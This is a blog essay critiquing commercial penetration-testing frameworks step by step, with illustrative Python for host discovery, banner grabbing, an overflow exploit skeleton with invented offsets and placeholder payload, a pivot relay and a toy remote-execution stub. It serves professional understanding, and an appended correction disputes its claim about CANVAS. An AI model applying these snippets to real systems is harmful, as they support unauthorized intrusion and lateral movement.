Metasploit, SAINT-exploit, Core-Impact and CANVAS are names you've probably heard in any conversation about penetration testing and the frameworks developed to speed it up and enhance it. By "framework" I mean a set of tools, code and scripts integrated to help the user accomplish all, or at least most, of the tasks s/he should focus on in a pen-test session, including but not limited to information gathering (AKA foot-printing), identifying targets, analyzing them for potential vulnerabilities, developing exploits for those flaws, gaining access to the target, and the post-exploitation tasks that follow, which can become another loop of the same steps.
In a normal pen-test, each step has its own definition, tools and plans to check and try. The agent needs a deep level of knowledge and experience to manage and finish every step and summarize the results of each one to feed the next. After any step, the agent usually faces tons of results that must be cleaned up, separating false positives from missed items. In a traditional pen-test session it's the agent who takes care of everything and fits the pieces of the puzzle together. But in an automated session the story is a bit different. If the way the market describes these frameworks (as "automated ethical hackers") were true, the tool they sell should be able to automatically finish every step, summarize the results and move to the next, identify flaws, successfully exploit them, and finally leave the user with access to the compromised system for post-exploitation tasks. Of course, these tools are not expected to be used by a raw brain who knows nothing about what he's doing.
But how experienced should the end-user be? Reading some of the advertising suggests a picture like this: the customer purchases a copy of the software, one of the technical guys in the company launches the framework against the managed IP ranges while following the tool's documentation, and by the end of the working day the company can assume it is aware of any potential vulnerability hackers might abuse, while also checking how effective its IPS is. Such descriptions and advertisements, IMO, give a false sense of security and power (of knowledge) to the end-user, leaving some doors open for experienced attackers. The truth is that such advertisements really sell! It's not that hard to make your boss pay for a wizard capable of owning your enterprise in a matter of clicks. Why pay $100k each year for a red-team when we can bring one into the office for usually less than $20k?
Here is exactly where we should take a look under the hood. Let's see what these tools really offer and who the real end-user of such products should be. Skipping some post-exploitation features, most of the public frameworks out there are actually the same ideas with different implementations. As I mentioned at the beginning of this note, there are some basic steps every framework/agent should follow in a pen-test session. Let's see how our so-called automated tools handle each step, and how it really should be done.
Taking foot-printing as the first step, none of the available tools on the market has anything cool to offer, only some simple routines for automated discovery of live hosts, open ports and the remote operating system (and version). So basically we feed the tool a range of IP addresses. Seems to work, right? Yes and no. "Yes" when the tool is used on a local, unprotected network where every host can be fingerprinted by various methods including ARP pings, sniffing broadcasts, enumerating RPC interfaces and so on. "No", which is the better answer, is when we face a serious job and work from outside the borders of the target network.
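To give an idea of the kind of local discovery these routines automate, here's a minimal ARP sweep sketch in Python (assuming the third-party scapy library; the address range is an example, and it needs raw-socket/root privileges):

```python
# Minimal local-network host discovery via ARP who-has broadcasts.
# Only hosts on the same segment answer, which is exactly why this
# class of trick stops working from outside the target network.
from scapy.all import ARP, Ether, srp

def arp_sweep(cidr="192.168.1.0/24", timeout=2):
    """Broadcast ARP requests for a range and collect the replies."""
    answered, _ = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=cidr),
        timeout=timeout, verbose=False)
    return [(rcv.psrc, rcv.hwsrc) for _, rcv in answered]

if __name__ == "__main__":
    for ip, mac in arp_sweep():
        print(f"{ip}\t{mac}")
```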
The basic foot-printing these tools are capable of no longer works these days; most of their features come in handy only when you're already inside. Besides, most of them do not offer more in-depth fingerprinting options like digging into DNS servers, brute-forcing hostnames, etc. Blindly pinging IP ranges and checking for open ports is no longer an interesting way of discovering hosts behind firewalls. The results of foot-printing can be considered good enough only once we've tried public search engines, registered domains, dug through every possibly linked DNS server, traced any available email headers, and brute-forced hostnames and subdomains. Finishing these tasks requires hours of searching and trial & error from the agent, or nice fingerprinting tools and scripts mixed with AI. Both (the human resources and the fingerprinting scripts) are available these days, but we cannot find any good sign of them in the frameworks out there. So in the end we actively help our framework through the first step, finishing it manually or using third-party tools to make food for our IP-hungry framework. We finish the first step by compiling the list of IP addresses we'll work on in the next one.
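Hostname brute forcing, for example, needs nothing fancy; here's a minimal sketch (the domain and wordlist are placeholders, and a real run needs a large list plus some rate limiting):

```python
# Minimal subdomain brute-forcing sketch using blocking DNS lookups.
import socket

def brute_subdomains(domain, words):
    """Resolve word.domain for every candidate; keep the ones that exist."""
    found = {}
    for w in words:
        name = f"{w}.{domain}"
        try:
            found[name] = socket.gethostbyname(name)
        except socket.gaierror:
            pass  # name does not resolve, move on
    return found

if __name__ == "__main__":
    hits = brute_subdomains("example.com", ["www", "mail", "vpn", "dev"])
    for name, ip in sorted(hits.items()):
        print(f"{name} -> {ip}")
```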
The next step is analyzing the gathered IP addresses to find out the details of running software, services and their versions. The results of this step are usually our only source of information for the next one: exploiting flaws, which requires specific details about targets. Let's see how current frameworks handle this step and how it should be handled. The process begins with probing hosts for open ports, continues with identifying the software listening behind each of them, and finishes with pinning down the exact version of each piece of software. Unless we've finished the above correctly, we have no idea whether the remote target is vulnerable to any known or unknown flaw. Of course, there's always the option of assuming the running version is a common one and trying to exploit it blindly in the next step. The available products are good enough to finish this step, but they are not as polished as other choices we have outside the package. For example, they don't have a massive database for fingerprinting and matching services like Nmap's, although they all support its output. The only one that looks good at this step is Core-Impact. They also usually fail if the target software is not listening on its default port, except for some protocols like HTTP, RPC and a few others.
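The first piece of this step is trivial to script yourself; here's a minimal banner-grabbing sketch (host and ports are placeholders, and real fingerprinting needs protocol-specific probes, which is exactly what Nmap's database provides):

```python
# Connect, read whatever the service volunteers, keep it for later
# version matching. Services that wait for the client to speak first
# (like HTTP) need a protocol-specific probe instead.
import socket

def grab_banner(host, port, timeout=3):
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            return s.recv(1024).decode(errors="replace").strip()
    except OSError:
        return None  # closed, filtered, or silent

if __name__ == "__main__":
    for port in (21, 22, 25):
        banner = grab_banner("192.0.2.10", port)
        if banner:
            print(f"{port}/tcp: {banner}")
```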
The real game begins here at the third step: trying to exploit discovered flaws, or, even cooler, developing exploits based on previous findings and using them to jump in. Here's where we really need frameworks and where they should show their real power and capabilities. In a normal pen-test, after finishing the previous steps the agent has enough information to focus on a specific software/service as the target and to find the best possible way of exploiting its vulnerabilities. "Best" here means the most stable way of exploiting the flaw, in a manner that makes the least impact on the target while flying under the radar of monitoring, detection and protection mechanisms. If there were no frameworks out there, the agent would build the exploit from scratch based on every single finding from the previous steps. For example, he would tune addresses to exactly match the remote versions and choose the best possible payload for the situation (it may be a simple port-bind or an ACL-flashing payload). As for flying under the radar, the agent must try the best possible/available techniques to stay stealthy, and the most stealthy technique is not always the best choice. So there's much to do in preparing an exploit. For a sensitive and special case (or target) we really need to fine-tune the exploit carefully, as there may be no second chance at all. But in many cases (routine tests) the agent faces straightforward, already-tried vulnerabilities. All he needs to do is customize an available resource (exploit) to match the new target, version and situation, which means repeating the exploit-development stages, and that can be really time consuming.
Let's see how available frameworks can help and speed up this process. Once we know the technical details of the targeted vulnerability (details like how to deliver the payload to the target service, buffer size, heap states, bad chars, preferred code-execution technique, etc.), all we have to do is write a few lines in the framework's language to tell it how and where to send a payload and teach it the details of the flaw. If you've been careful enough in providing correct details, the available frameworks are stable enough to give back working results, while hiding many details of exploitation from the user, including generating the payload (taking care of bad chars and encoding) and sending it over the wire. Most of them have recently been armed with advanced techniques for generating and sending payloads undetectable by the current market of monitoring and intrusion-detection mechanisms. SMB & RPC fragmentation, encrypted sessions and the encoded payloads used in client-side attacks are some good examples available in MSF, CANVAS and Core-Impact.
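To make those "few lines" concrete, here's a rough sketch of the kind of details you end up supplying, written with plain sockets; the service, offsets, addresses and bad chars are all invented for illustration, and a real framework would generate and encode the payload for you:

```python
# Sketch of the per-version details behind a classic stack overflow.
# Everything here is made up; the point is how little you write once
# the framework hides payload generation, encoding and delivery.
import socket, struct

TARGETS = {
    # From the analysis step: the return address must match the exact
    # remote build, or there may be no second chance at all.
    "ExampleFTPd 1.0": {"offset": 268, "ret": 0x7C86467B},
    "ExampleFTPd 1.1": {"offset": 272, "ret": 0x7C86250D},
}
BADCHARS = b"\x00\x0a\x0d"   # bytes the vulnerable parser mangles
PAYLOAD = b"\xcc" * 32       # placeholder; a framework encodes a real
                             # payload around BADCHARS for us

def exploit(host, port, version):
    t = TARGETS[version]
    assert not any(b in PAYLOAD for b in BADCHARS)
    buf = b"A" * t["offset"] + struct.pack("<I", t["ret"]) + PAYLOAD
    with socket.create_connection((host, port)) as s:
        s.sendall(b"USER " + buf + b"\r\n")  # deliver via the FTP USER verb
```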
Although frameworks look cool and complete at this step, they are again not a final, ready-to-use solution for discovered vulnerabilities. Even when the targeted vulnerability has already been added to the framework, the user often faces an incorrect or unmatched version of the target software. Skipping some specific Windows vulnerabilities that can be exploited universally, in most cases the user must supply the correct details for exploiting the flaw, and if the end-user isn't experienced enough to find the correct details for his own version of the targeted system, he will be limited to the framework's hardcoded details. To be clear: the exploits provided in frameworks are useless if the end-user doesn't have the knowledge to modify them correctly! This level of knowledge means an agent capable of coding simple (and sometimes not so simple) exploits for common overflow cases, including but not limited to heap or stack overruns.
When the user works on exploiting a flaw found during his own analysis, or one not already provided in the framework, he has no choice but to develop his own module for it. Current frameworks have enough interesting options to offer at this step.
In order to develop modules for a framework, the user first must get familiar with it. One option is reading the code of the provided exploits, modules and framework core components, which is the hard but more effective way of learning. The next option is checking the framework's documentation (if there is anything to read!). If you're going to select CANVAS, be warned that you have nothing to follow but code comments. If you choose MSF, you'll have a nicely documented API and many public resources on how to develop modules for it. If you choose Core-Impact, a few development guides compiled as CHM files are available in the package, with a few fully commented sample exploits and some other hints for basic development. I've not checked the latest versions of the Impact dev-guide, but you cannot find anything there about the advanced features of the framework; the only resources are, again, the provided Python exploit modules. For example, neither CANVAS nor Core-Impact documents its payload encoders, NOP generators or evasion details (in any organized manner).
Documentation aside, AFAIK Metasploit is the only framework providing scripts and tools for the primary stages of development, like determining bad chars, determining buffer sizes, locating proper jump points in binaries, etc. In the others you have to extract the required details from your debugger or custom scripts and fill in the blanks in the framework.
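For reference, here's a simplified Python stand-in for the unique-pattern trick behind MSF's pattern_create/pattern_offset scripts (not MSF's actual code):

```python
# Overwrite the buffer with a non-repeating pattern, crash the target,
# then map the value that lands in EIP back to a buffer offset.
import itertools, string

def pattern_create(length):
    """Aa0Aa1Aa2... pattern; short substrings don't repeat, so the
    bytes seen in a register map back to a single offset."""
    gen = (a + b + c for a, b, c in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    out = "".join(itertools.islice(gen, length // 3 + 1))
    return out[:length]

def pattern_offset(needle, length=8192):
    """Offset of the 4 chars seen in the crash (in practice you'd first
    convert the register value from hex back to its ASCII chars)."""
    return pattern_create(length).find(needle)

if __name__ == "__main__":
    print(pattern_create(20))      # Aa0Aa1Aa2Aa3Aa4Aa5Aa
    print(pattern_offset("a4Aa"))  # 13
```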
Once again it becomes clear that the end-user of a framework MUST be experienced enough if he wants the full benefits of the product. I doubt that every company out there purchasing or downloading one of these frameworks has such a cool guy in the office! Of course, when talking about "customers" I'm skipping the companies that purchase or get frameworks to speed up their consultancy services, such as penetration testing or research.
If the agent has successfully passed the mentioned steps, it's finally time to own targets. But hey, sometimes it's not as simple as getting a remote shell from a compromised system. The agent may need to get deeper into the network, detect and compromise more hosts from the entry point, grab some data or fool administrators to reach the final penetration-test target.
In order to finish this step successfully, the agent should have a previously prepared set of tools (home-grown, or tools released by the community) ready for the game. Some people prefer a mix of a few generic tools plus their own coding/scripting experience, while others prefer a complete collection of tools already customized and tuned for every single task.
Assuming the agent must jump from one host to another, the portability of tools sometimes becomes troublesome and annoying. Not all tools are platform-independent, and a compromised host doesn't always have all of your tool-set's dependencies. Besides that, the agent should stay stealthy while working; moving every single tool onto the remote network is not a good idea, as admins can always be there, monitoring. Transferring the targeted data is not always as simple as copying it to the agent's host or an internet-readable directory; sometimes it's necessary to bypass multiple strict firewall rules and policies to extract data from protected back-end servers. And finally, there are always prying eyes watching every single packet on the network! These are some of the post-exploitation challenges an agent may face in his penetration test.
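A tiny example of the kind of glue an agent ends up writing here: a single-connection TCP relay to pivot traffic through a compromised host (addresses and ports are placeholders):

```python
# Forward a local port through this host to an inner target, so tools
# that can't reach the target directly still get a connection.
import socket, threading

def pipe(src, dst):
    """Copy bytes one way until either side closes."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        dst.close()

def relay(listen_port, target_host, target_port):
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", listen_port))
    srv.listen(1)
    client, _ = srv.accept()
    upstream = socket.create_connection((target_host, target_port))
    threading.Thread(target=pipe, args=(client, upstream)).start()
    pipe(upstream, client)

if __name__ == "__main__":
    relay(8080, "10.0.0.5", 80)  # expose inner host 10.0.0.5:80 locally
```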
Let's see what frameworks have to offer. During recent years many techniques have been researched by the community, some of them cutting-edge work showing new aspects of the post-exploitation step. Syscall proxying is the most notable research, introduced by Oliver Friedrichs and Tim Newsham back in 2001 as a model; the first implementation was brought to the community by Core Security in Core-Impact. CANVAS does this in its unique MOSDEF way, which lets you remotely compile your custom code into memory, while Core-Impact and MSF let you load binaries (DLL binaries) remotely. In the current market, Core-Impact and CANVAS are the only products supporting post-exploitation based on syscall proxying.
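To show the model itself (a toy sketch, nothing like Core-Impact's wire protocol; the port and the whitelisted calls are invented), syscall proxying boils down to a thin stub executing calls on the attacker's behalf, so no tools ever touch the target's disk:

```python
# Toy syscall-proxying model. pickle is fine for a sketch; never use it
# on a hostile network.
import os, pickle, socket, struct

def recv_exact(conn, n):
    data = b""
    while len(data) < n:
        chunk = conn.recv(n - len(data))
        if not chunk:
            raise ConnectionError("peer closed")
        data += chunk
    return data

def send_obj(conn, obj):
    blob = pickle.dumps(obj)
    conn.sendall(struct.pack("!I", len(blob)) + blob)

def recv_obj(conn):
    size, = struct.unpack("!I", recv_exact(conn, 4))
    return pickle.loads(recv_exact(conn, size))

# Stub side (runs on the compromised host): tiny, executes whitelisted
# calls on request and ships the results back.
ALLOWED = {"listdir": os.listdir, "getcwd": os.getcwd}

def serve_stub(port=4444):
    srv = socket.socket()
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    conn, _ = srv.accept()
    while True:
        name, args = recv_obj(conn)
        send_obj(conn, ALLOWED[name](*args))

# Attacker side: feels like calling os.* locally, but everything
# executes on the remote host.
def remote_call(conn, name, *args):
    send_obj(conn, (name, args))
    return recv_obj(conn)
```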
As you can see, for this last step the work is as simple as some point-and-clicks. The end-user can enjoy browsing compromised hosts without worrying about the blocks of data moving between them.
Reporting is the last step. No doubt tools are always faster than us at report generation, but the report of a penetration test is not like reporting the open ports and missing patches of a scanned network. No matter how detailed and user-friendly the generated reports are, they cannot be used as the final output. In the best cases you can grab parts of the generated reports (if any are available) and use them in the final report. The current state of frameworks in report generation is not interesting at all; they come in handy only when you want to cite exact times, dates or some detailed debugging information. Core-Impact generates graphical reports and parts of them are really useful, but the others have only just begun caring about reports: MSF only supports its detailed debugging output, and CANVAS recently added a few options generating pretty raw and simple output. Of course, canvas.log is always there for your reference, filled with a time-stamped log of the actions you've performed in the framework.
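As an example of the glue work reporting still requires, here's a sketch that pulls time-stamped actions out of a session log into a table for the final report; the log format here is invented for illustration, not canvas.log's real one:

```python
# Extract (timestamp, action) pairs from an assumed line-oriented log.
import re

LINE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<action>.+)$")

def summarize(log_path):
    rows = []
    with open(log_path) as fh:
        for line in fh:
            m = LINE.match(line.strip())
            if m:
                rows.append((m.group("ts"), m.group("action")))
    return rows

if __name__ == "__main__":
    for ts, action in summarize("session.log"):
        print(f"{ts} | {action}")
```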
Summarizing the above paragraphs clearly shows that current penetration-testing frameworks/products are not what the market announces them to be. I don't mean they are useless or poor; they are simply not the packages you may read about on vendor sites, in advertisements or from community hype. On the other hand, it's now clear that what the developers of these frameworks consider "customers" are not who most people think. Developers expect their product to be used by experienced end-users capable of using the framework as the base of their tool-set, NOT as their final, ultimate hack-pack. At the same time, a large number of the people interested in such products think that once they purchase one, they gain the power and knowledge of the framework's developers and nothing is left for them to do. They happily expect to launch the so-called QA-ed and brand-new exploits against their targets and get in; after multiple failed tries they may even think they've been tricked!

The truth is that this group of customers should NOT be the end-users. Before wasting your budget, qualify yourself and check whether such a product can really help you or your company. If you expect the product to do the magic for you, you're probably choosing the wrong product; but if you think a framework can boost your already sorted tool-set, and you can modify and enhance its features YOURSELF, then I think paying for it is the right decision. All of the available frameworks have support and experienced teams behind them, but the truth is that you cannot expect too much from them. As I've experienced multiple times, they are all cool and great when replying to your requests, but you shouldn't expect them to do every sort of thing for you. Finally, I think it's better to rely on the features of a framework rather than on its exploits. Yes, their exploits save the time you would spend on your own exploit, but it's not a single exploit-code that makes a framework powerful. Frameworks are valuable because they provide a great base and platform for your exploits and your exploitation process.
*Btw, comments are always welcome here :)
Drop me a line if you'd like to read about specific topics here.
[Updated 08 February 2007]
Thanks Dave for your review :>
"CANVAS do this in it’s unique MOSDEF way which let you remotely compile your custom codes into memory but Core-Impact and MSF let you load binaries (DLL binaries) remotely. In current market, Core-Impact and CANVAS are the only products support post-exploitation based on syscall proxying."
Except, of course, CANVAS doesn't do syscall proxying at all, since, as you say, it uses MOSDEF.